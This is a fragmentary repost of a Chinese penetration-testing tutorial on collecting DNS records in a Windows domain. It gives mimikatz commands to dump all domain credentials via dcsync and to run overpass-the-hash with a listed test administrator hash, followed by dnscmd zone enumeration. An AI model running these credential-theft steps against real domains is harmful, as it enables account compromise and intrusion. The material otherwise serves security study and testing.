加入收藏 | 设为首页 | 会员中心 | 我要投稿 核心网 (https://www.hxwgxz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

域渗透——DNS记录的获取

发布时间:2019-03-29 23:44:39 所属栏目:建站 来源:3gstudent
导读:0x00 前言 在域渗透中,对域环境的信息搜集很关键,如果我们获得了域内管理员的权限,那么如何能够快速了解域内的网络架构呢?DNS记录无疑是一个很好的参考。 本文将要介绍在域渗透中,获取DNS记录的常用方法。 0x01 简介 本文将要介绍以下内容: 通过DNS M

域控制器上执行mimikatz:

  1. mimikatz.exe privilege::debug "lsadump::dcsync /domain:test.local /all /csv exit" 

实际测试

测试环境的参数如下:

  • 域管理员用户:Administrator
  • 口令:DomainAdmin456!
  • hash:A55E0720F0041193632A58E007624B40

Overpass-the-hash:

  1. mimikatz.exe privilege::debug "sekurlsa::pth /user:Administrator /domain:test.com /ntlm:A55E0720F0041193632A58E007624B40" 

这样会弹出一个cmd.exe

接着使用dnscmd远程连接进行查询:

  1. Dnscmd WIN-F08C969D7FM.test.com /EnumZones 

or

  1. Dnscmd WIN-F08C969D7FM /EnumZones 

注:这里要使用FQDN或者计算机名。

(编辑:核心网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读